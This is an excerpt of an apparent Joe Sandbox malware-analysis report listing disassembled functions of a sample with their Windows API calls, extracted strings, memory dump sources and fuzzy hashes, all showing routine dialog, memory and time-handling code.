        • Instruction ID: 04314c1c2dd09496a86ee1f9a64fbdc94fd7d4fe94c3322dac450c6c3fcde57d
        • Opcode Fuzzy Hash: b5f3fc202f7aea3e2d1564fa31267517fe51ac9267a217e1ae6603f17c61b0a4
        • Instruction Fuzzy Hash: AB51EFB1A087159FC748CF19D48055AF7E1FF88314F058A2EE899E3740DB34E959CB96
        Function 00135001 Relevance: .1, Instructions: 112COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
        • Instruction ID: 29cf003593e40ac6984c79cf344d75786ad4af82725c8a63053f86b241d505af
        • Opcode Fuzzy Hash: 74cd97078976d413443546a5e6f1c41999260f7e4caf4087a6071dd61f1d0527
        • Instruction Fuzzy Hash: 0031E3B1614B158FCB18DF28C89126ABBE1EB95700F10492DF496C7742C735E959CF91
        Function 0013D872 Relevance: 47.7, APIs: 23, Strings: 4, Instructions: 428windowCOMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0013D877
          • Part of subcall function 0013C4F4: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0013C5DB
        • _wcslen.LIBCMT ref: 0013DB3D
        • _wcslen.LIBCMT ref: 0013DB46
        • SetWindowTextW.USER32(?,?), ref: 0013DBA4
        • _wcslen.LIBCMT ref: 0013DBE6
        • _wcsrchr.LIBVCRUNTIME ref: 0013DD2E
        • GetDlgItem.USER32(?,00000066), ref: 0013DD69
        • SetWindowTextW.USER32(00000000,?), ref: 0013DD79
        • SendMessageW.USER32(00000000,00000143,00000000,0017389A), ref: 0013DD87
        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0013DDB2
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
        • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
        • API String ID: 2804936435-312220925
        • Opcode ID: 9559eed4c807a0a29d28919c3c3f100db27678b8015d3b601795fbbfb27c9625
        • Instruction ID: 454dc8bed77550ff71a47f1a39e87ca1f5ac98e54eb3f3a3d0a2ef4497469722
        • Opcode Fuzzy Hash: 9559eed4c807a0a29d28919c3c3f100db27678b8015d3b601795fbbfb27c9625
        • Instruction Fuzzy Hash: 67E14272900218AADF25DBA4EC85EEE77BCEF15314F5444A6F609E7090EF749F848B60
        Function 0012F608 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
        Download Yara Rule
        APIs
        • _swprintf.LIBCMT ref: 0012F62E
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
          • Part of subcall function 001330E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00163070,00000200,0012EC48,00000000,?,00000050,00163070), ref: 00133102
        • _strlen.LIBCMT ref: 0012F64F
        • SetDlgItemTextW.USER32(?,00160274,?), ref: 0012F6AF
        • GetWindowRect.USER32(?,?), ref: 0012F6E9
        • GetClientRect.USER32(?,?), ref: 0012F6F5
        • GetWindowLongW.USER32(?,000000F0), ref: 0012F795
        • GetWindowRect.USER32(?,?), ref: 0012F7C2
        • SetWindowTextW.USER32(?,?), ref: 0012F7FB
        • GetSystemMetrics.USER32(00000008), ref: 0012F803
        • GetWindow.USER32(?,00000005), ref: 0012F80E
        • GetWindowRect.USER32(00000000,?), ref: 0012F83B
        • GetWindow.USER32(00000000,00000002), ref: 0012F8AD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
        • String ID: $%s:$CAPTION$d
        • API String ID: 2407758923-2512411981
        • Opcode ID: ed2c4aa354ea1000c2f16096d89fa2108ec291def34acd9440a3050db33d856f
        • Instruction ID: 1b36c15ba9a90daf07a396ab9436706539ca2184855528291cc5c48081c4b3f6
        • Opcode Fuzzy Hash: ed2c4aa354ea1000c2f16096d89fa2108ec291def34acd9440a3050db33d856f
        • Instruction Fuzzy Hash: 51819072208311AFD710DF68DD89B6BBBF9EB88704F04092DF985E7290D770E9498B52
        Function 0014DCD2 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • ___free_lconv_mon.LIBCMT ref: 0014DD16
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D8CE
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D8E0
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D8F2
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D904
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D916
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D928
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D93A
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D94C
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D95E
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D970
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D982
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D994
          • Part of subcall function 0014D8B1: _free.LIBCMT ref: 0014D9A6
        • _free.LIBCMT ref: 0014DD0B
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014DD2D
        • _free.LIBCMT ref: 0014DD42
        • _free.LIBCMT ref: 0014DD4D
        • _free.LIBCMT ref: 0014DD6F
        • _free.LIBCMT ref: 0014DD82
        • _free.LIBCMT ref: 0014DD90
        • _free.LIBCMT ref: 0014DD9B
        • _free.LIBCMT ref: 0014DDD3
        • _free.LIBCMT ref: 0014DDDA
        • _free.LIBCMT ref: 0014DDF7
        • _free.LIBCMT ref: 0014DE0F
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
        • String ID:
        • API String ID: 161543041-0
        • Opcode ID: d4bc9867a4378566067223a119522a655c6bd0edeb25fa003af69b03d5aaa1ab
        • Instruction ID: fc505fe769f410456f5466c97255323f66ac81e4b8a1315c0b86fd490b60a2e4
        • Opcode Fuzzy Hash: d4bc9867a4378566067223a119522a655c6bd0edeb25fa003af69b03d5aaa1ab
        • Instruction Fuzzy Hash: A5313E31A016059FEF21AAB8F849B5673E9FF20311F96442AF499D71B1DF71AC40CB15
        Function 0013A6C1 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
        Download Yara Rule
        APIs
        • _wcslen.LIBCMT ref: 0013A6E6
        • _wcslen.LIBCMT ref: 0013A786
        • GlobalAlloc.KERNEL32(00000040,?), ref: 0013A795
        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 0013A7B6
        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013A7DD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
        • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
        • API String ID: 1777411235-4209811716
        • Opcode ID: 606a27173cbe93e3ac1bf0c3b21a3171f938a0ef1b6b95ac9b802c54848f805d
        • Instruction ID: e8cff0ad7377e56a14d26f80d6d523bdd9b89608826d5286c00e481366d3cf85
        • Opcode Fuzzy Hash: 606a27173cbe93e3ac1bf0c3b21a3171f938a0ef1b6b95ac9b802c54848f805d
        • Instruction Fuzzy Hash: DC31AD32104301BFE725EB709C86F6F7BACEFA1721F54001EF4819A1E1EF60994883A6
        Function 0013E7DE Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
        Download Yara Rule
        APIs
        • GetWindow.USER32(?,00000005), ref: 0013E801
        • GetClassNameW.USER32(00000000,?,00000800), ref: 0013E82D
          • Part of subcall function 00133306: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013306,0012D523,00000000,.exe,?,?,00000800,?,?,?,00139E4C), ref: 0013331C
        • GetWindowLongW.USER32(00000000,000000F0), ref: 0013E849
        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0013E860
        • GetObjectW.GDI32(00000000,00000018,?), ref: 0013E874
        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0013E89D
        • DeleteObject.GDI32(00000000), ref: 0013E8A4
        • GetWindow.USER32(00000000,00000002), ref: 0013E8AD
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
        • String ID: STATIC
        • API String ID: 3820355801-1882779555
        • Opcode ID: b3a2a910691ac38115d67c92e6148ae46dd33e8b4ec2dd86d4fa230ed1a28e76
        • Instruction ID: 8fdedeade37680b7bd13b5d0a9d977c7d003427c198ccf6c795de03dcf8e87de
        • Opcode Fuzzy Hash: b3a2a910691ac38115d67c92e6148ae46dd33e8b4ec2dd86d4fa230ed1a28e76
        • Instruction Fuzzy Hash: 3E115932944B107BE7206B70DC8EFAF7B9EFF50700F000060FA41A60D1DB648A4647B1
        Function 0014A411 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
        Download Yara Rule
        APIs
        • _free.LIBCMT ref: 0014A425
          • Part of subcall function 0014A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC), ref: 0014A670
          • Part of subcall function 0014A65A: GetLastError.KERNEL32(00154ADC,?,0014DA46,00154ADC,00000000,00154ADC,00000000,?,0014DA6D,00154ADC,00000007,00154ADC,?,0014DE6A,00154ADC,00154ADC), ref: 0014A682
        • _free.LIBCMT ref: 0014A431
        • _free.LIBCMT ref: 0014A43C
        • _free.LIBCMT ref: 0014A447
        • _free.LIBCMT ref: 0014A452
        • _free.LIBCMT ref: 0014A45D
        • _free.LIBCMT ref: 0014A468
        • _free.LIBCMT ref: 0014A473
        • _free.LIBCMT ref: 0014A47E
        • _free.LIBCMT ref: 0014A48C
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorFreeHeapLast
        • String ID:
        • API String ID: 776569668-0
        • Opcode ID: fad2f727a77d0b5caf266725a7666e15ad2fc43954351253b2eee340b5c74f34
        • Instruction ID: a9a0e212b78e9572192223e41e99ae8bd0bd79b2d5b239b11f2058b32e74adbc
        • Opcode Fuzzy Hash: fad2f727a77d0b5caf266725a7666e15ad2fc43954351253b2eee340b5c74f34
        • Instruction Fuzzy Hash: F411B676141108BFCB01EF54E956CDD3BA9EF24351B9780A1FA588F232DB31EE519B82
        Function 00143FB1 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
        • String ID: csm$csm$csm
        • API String ID: 322700389-393685449
        • Opcode ID: 9ff01ec809be0903b1cb7e48bd9660f1ab0dc0c864c46538be8b449c747bbdf8
        • Instruction ID: ab9803c8172ec995fb63e3b46ef5b678d18443b697e3c2015ed7e1f650980849
        • Opcode Fuzzy Hash: 9ff01ec809be0903b1cb7e48bd9660f1ab0dc0c864c46538be8b449c747bbdf8
        • Instruction Fuzzy Hash: 17B19C71800219EFCF18DFA4D881AAEBBB5FF24310F15416AF8156B222D771EE61CB91
        Function 0012C3F7 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 210comCOMMON
        Download Yara Rule
        APIs
        • __EH_prolog.LIBCMT ref: 0012C3FC
        • CoCreateInstance.COMBASE(001568A0,00000000,00000001,001567D0,?), ref: 0012C41E
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateH_prologInstance
        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
        • API String ID: 457505298-3505469590
        • Opcode ID: 682e9d6bc0bb00122552f6538dd8a654a98391fdf5e48f20aa8e11e8644cf664
        • Instruction ID: dc4f19871bfc6f26ea47ed832218a23982b85c9acea3563cb2311a26655d5b2a
        • Opcode Fuzzy Hash: 682e9d6bc0bb00122552f6538dd8a654a98391fdf5e48f20aa8e11e8644cf664
        • Instruction Fuzzy Hash: 00716C71A00229EFDB14DFA4EC949AFB7B9FF48315B140559F512EB6A0CB30AD41CBA0
        Function 0013C7A0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 001212F6: GetParent.USER32(?), ref: 0012132A
          • Part of subcall function 001212F6: GetDlgItem.USER32(00000000,00003021), ref: 0012133A
          • Part of subcall function 001212F6: SetWindowTextW.USER32(00000000,001545F4), ref: 00121350
        • EndDialog.USER32(?,00000001), ref: 0013C7F0
        • SendMessageW.USER32(?,00000080,00000001,?), ref: 0013C817
        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0013C830
        • SetWindowTextW.USER32(?,?), ref: 0013C841
        • GetDlgItem.USER32(?,00000065), ref: 0013C84A
        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0013C85E
        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0013C874
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: MessageSend$Item$TextWindow$DialogParent
        • String ID: LICENSEDLG
        • API String ID: 4098686847-2177901306
        • Opcode ID: f708a58518dc01daade81688e7a74e871bdc43c61a30647b276fb34b726d217a
        • Instruction ID: 029dc431d143179893e567a2c383a8133b86dd95217921c635c2370580e4cf75
        • Opcode Fuzzy Hash: f708a58518dc01daade81688e7a74e871bdc43c61a30647b276fb34b726d217a
        • Instruction Fuzzy Hash: ED21C432240604BBE7115F75EC4DF3B3BAEEB46B85F014015FA01F68A0CB629E819BB1
        Function 0012B5D6 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON
        Download Yara Rule
        APIs
        • _wcslen.LIBCMT ref: 0012B5E2
          • Part of subcall function 001326F1: GetSystemTime.KERNEL32(?), ref: 001326FF
          • Part of subcall function 001326F1: SystemTimeToFileTime.KERNEL32(?,?), ref: 0013270D
          • Part of subcall function 0013269A: __aulldiv.LIBCMT ref: 001326A3
        • __aulldiv.LIBCMT ref: 0012B60E
        • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0012B615
        • _swprintf.LIBCMT ref: 0012B640
          • Part of subcall function 00124A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00124A33
        • _wcslen.LIBCMT ref: 0012B64A
        • _swprintf.LIBCMT ref: 0012B6A0
        • _wcslen.LIBCMT ref: 0012B6AA
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time_wcslen$System__aulldiv_swprintf$CurrentFileProcess__vswprintf_c_l
        • String ID: %u.%03u
        • API String ID: 2956649372-1114938957
        • Opcode ID: 61c42332af7b5ee3c3e2d4fd855e165ba3c5115ba95f78039825af7bd0e17891
        • Instruction ID: 24274320da8ef7fa30ad2ba674c9e553781aa73caf6f5e861c4978861c35aba7
        • Opcode Fuzzy Hash: 61c42332af7b5ee3c3e2d4fd855e165ba3c5115ba95f78039825af7bd0e17891
        • Instruction Fuzzy Hash: 8F21B5B2A08310AFC714EF65DC86EAF77ECEBA8700F004929F545D7251DB30DA0887A2
        Function 0013BC1B Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68timeCOMMON
        Download Yara Rule
        APIs
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC2F
        • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0013BC40
        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0013BC4E
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0013BC5C
        • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0013BC77
        • GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 0013BC9E
        • _swprintf.LIBCMT ref: 0013BCC4
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Time$System$File$Format$DateLocalSpecific_swprintf
        • String ID: %s %s
        • API String ID: 385609497-2939940506
        • Opcode ID: d0021a2310d2adee722506a1dafceba89a38a1b995b134c96b723bb73abb72c0
        • Instruction ID: d37b92b677b171824b0fde949053d4775c9f02f60eb036ee4086769fe556981a
        • Opcode Fuzzy Hash: d0021a2310d2adee722506a1dafceba89a38a1b995b134c96b723bb73abb72c0
        • Instruction Fuzzy Hash: 3721C7B254115CABDB21DFA0EC85EEF3BACFF59305F140026FA19D6111E730EA898B60
        Function 00140EC0 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
        Download Yara Rule
        APIs
        • MultiByteToWideChar.KERNEL32(00000000,00000000,0012C43F,0012C441,00000000,00000000,CA793DC2,00000001,00000000,00000000,0012C32C,?,?,?,0012C43F,ROOT\CIMV2), ref: 00140F49
        • MultiByteToWideChar.KERNEL32(00000000,00000000,0012C43F,?,00000000,00000000,?,?,?,?,?,0012C43F), ref: 00140FC4
        • SysAllocString.OLEAUT32(00000000), ref: 00140FCF
        • _com_issue_error.COMSUPP ref: 00140FF8
        • _com_issue_error.COMSUPP ref: 00141002
        • GetLastError.KERNEL32(80070057,CA793DC2,00000001,00000000,00000000,0012C32C,?,?,?,0012C43F,ROOT\CIMV2), ref: 00141007
        • _com_issue_error.COMSUPP ref: 0014101A
        • GetLastError.KERNEL32(00000000,?,0012C43F,ROOT\CIMV2), ref: 00141030
        • _com_issue_error.COMSUPP ref: 00141043
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
